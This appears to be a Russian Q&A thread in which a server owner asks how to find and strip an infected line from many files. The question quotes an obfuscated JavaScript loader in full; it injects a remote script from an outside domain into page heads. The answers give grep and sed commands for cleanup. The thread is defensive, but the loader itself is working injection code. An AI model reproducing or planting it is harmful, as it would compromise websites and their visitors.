# Подготовка строки к команде grep

Tags: bash

Есть вот такая строка.

```
var _0x1e35=['length','fromCharCode','createElement','type','async','code121','src','appendChild','getElementsByTagName','script'];(function(_0x546a53,_0x3f720e){var _0x440369=function(_0x2e1b64){while(--_0x2e1b64){_0x546a53['push'](_0x546a53['shift']());}};_0x440369(++_0x3f720e);}(_0x1e35,0x1e1));var _0x5a05=function(_0x716551,_0x1d4a8e){_0x716551=_0x716551-0x0;var _0x2b7638=_0x1e35[_0x716551];return _0x2b7638;};var url=String[_0x5a05('0x0')](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x61,0x73,0x6b,0x6d,0x61,0x64,0x65,0x2e,0x6e,0x65,0x74,0x2f,0x68,0x65,0x61,0x64,0x2e,0x6a,0x73,0x3f,0x76,0x65,0x72,0x3d,0x31,0x2e,0x30,0x2e,0x30);var a=function(){var _0x22c9c8=document[_0x5a05('0x1')](String[_0x5a05('0x0')](0x73,0x63,0x72,0x69,0x70,0x74));_0x22c9c8[_0x5a05('0x2')]=String[_0x5a05('0x0')](0x74,0x65,0x78,0x74,0x2f,0x6a,0x61,0x76,0x61,0x73,0x63,0x72,0x69,0x70,0x74);_0x22c9c8[_0x5a05('0x3')]=!![];_0x22c9c8['id']=_0x5a05('0x4');_0x22c9c8[_0x5a05('0x5')]=url;document['getElementsByTagName'](String[_0x5a05('0x0')](0x68,0x65,0x61,0x64))[0x0][_0x5a05('0x6')](_0x22c9c8);};var scrpts=document[_0x5a05('0x7')](_0x5a05('0x8'));var n=!![];for(var i=scrpts[_0x5a05('0x9')];i--;){if(scrpts[i]['id']==_0x5a05('0x4')){n=![];}};if(n==!![]){a();}
```

Ей заражено множество файлов на сервере. Откатить изменений нет возможности.
В линуксе новичок. 
Нашел команду grep, с помощью которой думаю удалить строку.
Нет ли каких либо команд, которые могут отформатировать данную строку для включения ее в команду grep?

Comment: Что значит "отформатировать" ? в строке не содержится ни одной двойной кавычки и ни одной обратной косой черты, значит ее можно передавать в двойных кавычках. Хотя возможно стоит передавать grep лишь малую ее часть, которая всегда гарантированно постоянна (а то вдруг она на пару символов другой окажется ...) А для замены текста лучше использовать `sed`

Comment: В том то и дело что просто так передать ее не получается

Comment: Не очень понятны ваши затруднения, но даже если  искомый образец (ваша строка) находится в файле, то передать ее в grep можно, например, так: `grep "\`cat filename-with-pattern-string\`" ...`

Comment: grep -in -e "строка" `find -type f`  -- вот такую команду использую для нахождения файлов. Думал к ней добавить замену, однако ругается:   ![]: event not found

Comment: Может, `sed '/^var _0x1e35=/d' file > outfile'`

Answer (score 0):

Попробуйте так:

```
grep -rlsE '^var _0x1e35=*' ./* | xargs sed -E '/^var _0x1e35=*/d' -i
```

Так grep будет искать рекурсивно все файлы содержащие твою "любимую" строку в текущей папке и ниже и передавать ее sed, которая удалит ее.

Answer (score 0):

Лучше поздно, чем никогда...

У `grep` есть 2 полезных в данной ситуации ключа:

> -F, --fixed-strings
>                 Interpret PATTERN as a list of fixed strings (instead of regular expressions), separated by newlines, any of which is to be
>   matched.

который заставляет grep игнорировать как метасимволы все `[({` и т.п. в вашей строке
и

> -f FILE, --file=FILE
>                 Obtain patterns from FILE, one per line.

Если ваша строка в файле, скажем, `patfile`, то вот рекурсивный `grep` для печати имен искомых файлов, начиная с точки его запуска:

`grep -RlFf patfile .`